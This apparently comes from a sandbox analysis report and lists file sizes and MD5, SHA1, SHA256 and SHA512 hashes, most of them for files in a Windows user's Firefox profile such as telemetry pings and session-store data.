SHA51216a81e8991f5e16097799939509823992fdb268ed5468be2b0fa48660f16fda46c26df146018a9fb2c4bc4242d8f8e4e30eec93689b08ec6f48b0fa12480817e
-
Filesize
1.4MB
MD506b18d1d3a9f8d167e22020aeb066873
SHA12fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa
SHA25634b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579
SHA512e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066
-
Filesize
1.2MB
MD5e3f8c373ee1990eecfc3a762e7f3bc3b
SHA1888b6c33b4f66af32b41c3f0dec1f6c189f61fba
SHA25641b06a71f35f168f8772eb1d2cf420ebcd0afe2259728fd92d5fe4d0ea99ca6a
SHA5123a7f8cd9112ae71a90c168c8501f19d61b92123b67953e70189459ac189b8460dba8686fc850f5afe0a14798891f74a50c9697ea1ce1841ad6941fc0d4806b04
-
Filesize
1.2MB
MD5398ab46e27982dfd2028bf42f4832fa8
SHA132c00252fc57a6fc31c2b35915f3c8a2061305ca
SHA256033d584799e9ce55c7fc62adb86a6738a42fe2fa5f21035b66ee7b6c4c1fd6e1
SHA512a75fc40c3861048afad124e5b88d164e91b722365305869977f48c20ffa3129e546dd70c68bc6e7c459ec7ad89c94b02cb20e746a2b84a44ab182acf4d971b46
-
Filesize
1.1MB
MD5b38cd06513a826e8976bb39c3e855f64
SHA179eef674168786ff0762cfdb88a9457f8b518ed5
SHA2562e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2
SHA5126944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9
-
Filesize
4.5MB
MD5c982ba504c0d9dcc192e8c4bb0d1feb4
SHA153315168edce68a98012c5ef6828659d859916b5
SHA256fbb9412a24bd4cb50bc20ef77bde5aee297b00668190f901db0c7d1ee78915f6
SHA512ef0315483e9dc93993471d708cb45e3448e1b069fdc95ea76a6cf56af561badf3ff26d60b9f958095d857ad274ebc531815272abf5f9650fb09d852645e4862d
-
Filesize
4.4MB
MD506357d65456e7d0cc2ed87e06228ef72
SHA1ad729cd209b2e10dde0b2d5ad95b70a786d552a4
SHA25606710bd5a7b1d517acccbd4ce5528bbcd49961ef6999960fd5aa53c3cb75d5d3
SHA512641ddc2d9c8c47b4eb5de68df4f9d677141ce4d502fe86053edb6e01d0fba1ddce6d12bcb687c54028d006f02919cb7e8c6b9485a3e6ac62c1ad80e1342d9eef
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502
-
Filesize
1KB
MD5e5ddb7a24424818e3b38821cc50ee6fd
SHA197931d19f71b62b3c8a2b104886a9f1437e84c48
SHA2564734305286027757086ef56b9033319ec92c3756e3ca41d7bf22c631d392e1ea
SHA512450101acf9a4a39990d0cb0863794c0852fdf14f37a577af520fe7793b4ed70b5dd07a74f9fec42d9f762b4f45140eca75442b0ce76585a2c2646af64ffc4d21
-
Filesize
717B
MD548cafb3f4025db4f3bb5b1c2738669aa
SHA1aa413ed3fe22a7afdf5a498a8ebc280451925f12
SHA256c652b531b1211bbd49d5647cc6b68a879189f8cb95f3d01fa9f619dcf9b79650
SHA5124027771f64d3136461966e23c4dfb8a2106e3598f9c9b66aeb7e7bcf41729a3e9ddf956a8453caa2a98267494ca9275859dbd3cead39e0e0cd6f4d05d826d3cd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD5685dfecceb3a1336bccdda4bb9723938
SHA19e0f30bf90ff80291484169bd75fcd58aaf84940
SHA256289bdc2f2f5c81a774c34ff1e6083828e4038a71c541357e1ebabe20e120fa6c
SHA512a4d6889ce14feb3d2429ca9f2f6e20ee8066343588096b8cda12dfff3950d15077f42b0d78210333941e31ae64f47767d3bc7384f88bc8ffcef57e42c7bb5b05
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\AlternateServices.bin
Filesize10KB
MD5a784a587b7c6a4c2b7ce765ec089e1b4
SHA10b8c81a035a54c072280793790a3438306535bae
SHA256249fdbc5d6a0bfd1ec2393351d70516931598f98754ab3fc18256643a8a5305f
SHA512862cff2378fa9945dc61c1ab119b301e9f95ca584ae93eb9ef871a0ad5825a76a824113f4299af06e9f2c3ce3949bf34ea8c3b94715a4117572e3c48020de03a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\AlternateServices.bin
Filesize12KB
MD5deed2bbe2c79c1119b69748e72e8139d
SHA136ffcb8f13486cf99165b4accc0bde4e2d56fbd0
SHA256e97bdf0f12576921f7e261843bdbdbf05e1d39a8d2a1278a149da7678f66a8d3
SHA512713f57bdfac0a49192857d4f52c0f709c629ad2845027b6567892453132567d7f0505b4f4d7ba2019ec4a2e87ecffe7ab61d3e500692a4aac2cfecb295f33475
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\db\data.safe.tmp
Filesize3KB
MD5e7dbe868e70dd81c420097318ac39489
SHA1c23ad9568aca5a66c8c5e9efcea7a7b362c380e9
SHA2569fe8725f6aaf0d30b3ef97fd06a4c42bfde614e7f59468c0904e7129c1732ff3
SHA512e4d9b7fba0c33795a915c3734b80d777be37e06e8faffa2743ea35a156a32242c597a5e11bb4014cf8bc41fcc5b2b3d272ac8e061a6f2a1239cf3c26ec1fc32d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD580815e66ec50d559e3bf9b35210d3616
SHA1dd5ba5e98def5e5bf4195933fce94dc79a3cb7a8
SHA2562149050bd147cc790a44c8129e96f51bf55096080e06c5b2c1fbfd87e56c4d94
SHA5121db5c7c9b7a292f7f68664148fde988081e2b7eb0656e7ed52bf55f45b448c2b8c8c5aac99dcd0ec599a0982f10f17b1bfc75d33a70bc8e97e48e99b0add772a
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD57e2eca857af5d255d3107d431b538331
SHA1ec28c5b4ee3a86b77239d7e0a1d722f34645f264
SHA256009fea8c53d45b90eb3703823b05a7de382fda54eef3398e5e0a6c9ba9369389
SHA51203ce390459de7a5bb5c2bed88b9fb07fc5c2708e7e17ca1d72e8028b8ea96424d49f82e171ffdb19059a107acf467bc579ce43caaf59638945ce7543c849f8e9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\events\events
Filesize1KB
MD5aa20651fbab8c8ddd251e712ff493760
SHA1e4261b208a2cc6226d1081283a2bcaa8dcfd6da5
SHA256f96c2d82738c2d2e0966aed0f3aa970edc64849d481fc6a4065123f47fe3b855
SHA5123d257daa96cb4bc8a8cb17cb154137fd436f286f16bfe3792756b022629de30b98e7b7cb197e0a9254b594ebe9b8177a7786ebe2bff0f4afeffd77ea778666a9
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\02504ccc-1a70-4ae0-b49a-e519ab6085fb
Filesize886B
MD568cc5cde67a7c80e34934b2ee82d0d16
SHA1e8c1d394696a4781763c2e5c23bfe7d945eedb16
SHA256a4fef1823406abad10eb924e90ccdaddf19eddad7c82649edfc0f6bac59bcf67
SHA512c6657314cdad91b29e2a8cf24b3482e626102044fd02e6a224b31209687b7e17db6a216fa0bb3be401cd8112371705fbaa6e869569707246e9788ac54ae89167
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\3050b3b5-2a29-4c2d-9f14-a254290f66df
Filesize16KB
MD52e21fbe797999f179b7da365ed887316
SHA1c2fc609a391b620d6d05b0ce933aa108218b1a7d
SHA2565d49bc91bd67fb2cc7f815d856428da48840bf6852861ff7be9ca6258e336248
SHA51204d4947928c019c5cbde0d39c73456b6a176d3a171a236d386c153779485c9df681c767e7968ccf22670e15e48f1fc7c5fe392f51cf91c981bf56d07b76ff616
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\a8206e12-f384-48ae-be3b-0e48d604d402
Filesize883B
MD5ce213cb5c24360e7c1450c3da1997976
SHA14383d6b0aef9277d579e8b2b9c3a6b5065414bc2
SHA2565113a57c85463ca63a69053598bba60061782b715a53b933872b3084c9481414
SHA512827c8cb2def82a2cb052ac277ab7da44cdc2f51feba83cb64476f39bc99ab4b2ab013a722b42c136bbf29312ed30a9d3f8fd09c54b77d82b1099a60f47655413
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\c474e44e-8364-4c72-80b7-4fba02174115
Filesize235B
MD5be91a5d462e8f2df3010d82b7ec2d6f6
SHA10eaf3c769560069861ea0abcc650d89c3ae2fa98
SHA256ab9ebc121c39a7e530e22089972d5513638fc436e4d3cccee841b5f5529aa51d
SHA5129cefa38f0bd0dc76828ac86ab09cff4ac75e7593d30ba01c249a0c025c7c5c74faf578b91985b8f2ca1b7fea3d014dba0092afe4ec68cf77c2b484284fe09c6e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\eeb3600e-94cd-4142-9d6f-ee05bddd13e2
Filesize2KB
MD5724f8990a5ceba614a3dbbb497bfc888
SHA1c2f2dba383bf6b67246eca51515a66ac1e8a15b5
SHA2562b3750e67badef13ed780691f2a51947582e0947906f966f56edcb3a34fdf109
SHA512083f69f8362dc87b3336e7d414fe137e06aa9393cddd05539be89a12fb0aac05c1677c8242a9950aa02435c79313071b9f81e98d6eb9e81434aebd8e5970b886
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\datareporting\glean\pending_pings\ff10ea63-5c94-4dfd-ab63-581cf1836178
Filesize235B
MD5b9832fbf0d445ba20b17312d0d937e01
SHA15d18c58eaf4257a1f3b718d613a7a2b8c8662903
SHA2563d413689175a2104cfd5ff1cf480dac589280cadbff7f9faf00ec06d1da37596
SHA5120d8f00c54f2f99c8438927c7ca7a15a2e978a69ebcedca7347d6e467e229b7832eaa225255402103924385f1cc3859d9b5d17150397b5f9cc0e424d36a545a14
-
Filesize
7KB
MD54faacebfe5f032a458dbc767a79f6362
SHA1c4077f52483b2059e76de53729b0be0979a921b9
SHA2564ac1edf02aeecd295e304d8859b19b20844b10e7830fe2d4adeed451483c23f8
SHA512d044ec3956a208c2e2ae21f09bd6865bd1972e2a742d8a6da43d02509e8f6d15aea09f40a3c1d7315d7ae370498753debaa39eb3257a13d3b23ddbe59ccf468c
-
Filesize
6KB
MD584bfed8a42ce6081c23a197ac287a1ef
SHA19b12b632ffaac3ee4f237a71e8bf342036b508eb
SHA25611e28220f3836fe848a1858a22ecdd68037fc6a601f546a0ec859b6acc275a42
SHA512a0794cc7efd8743393d0f859f670d7c9d4484f442ab3f45a8e9b56cb10759066cf1703e5a669d4836162ed61b6bd8566c0b83ae88cf9c72aa1f2c221fababf99
-
Filesize
6KB
MD5d60ee0c8b948577b05c363a7055fe080
SHA104e4d2d62b7dd2685a09b36da1bfa4e229b88915
SHA2569e840a9941712ba43a3a3b18daaba21f0c9ffe51818c4892b0109fc4e343cb3e
SHA512843bb441ea5f99c81d89d8bc52b10bb608a73b89af1537016f95b07bdebce7f82c0bdb658e8a8940e1e93751baa4b4ce2310085b5715ead87e1ea37a53872459
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\60pbrgcr.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD5b2a00787cf6978a7dc9592e852a9732d
SHA13749654450f7e2cbe3b3fbc05922f453aa6fc1af
SHA25657c492bf86d887e3f8f0b509d2bcba822c1f884ccaeded61754d1bb694f04a5f
SHA51261ab9d9b43e5f624c5cad5000f91ff24dc8e4c21a024c1ab002fcb18567b89289953d5fc348420e76cbace3715cc1aad6507250953bb098e1d800b98a0c4b3bf
-
Filesize
6.1MB
MD583a704f7418165b337f992a7d7bae8a4
SHA1ef6ade5653c5140b32aa691ae311138b5f28b3cb
SHA256886e6def15a81553712164f5f8e4a0c831c9ba7cd4e281bce8f2a5f3e4906658
SHA5128449fc81dc6db7924d41760ef35ed58118dd1afdd55c9d1cd03b2fa2aae880d64754df37195aff68677fde7b0d12a9eae78c5326dd42d5a2ca26d4c3ae7ba3d3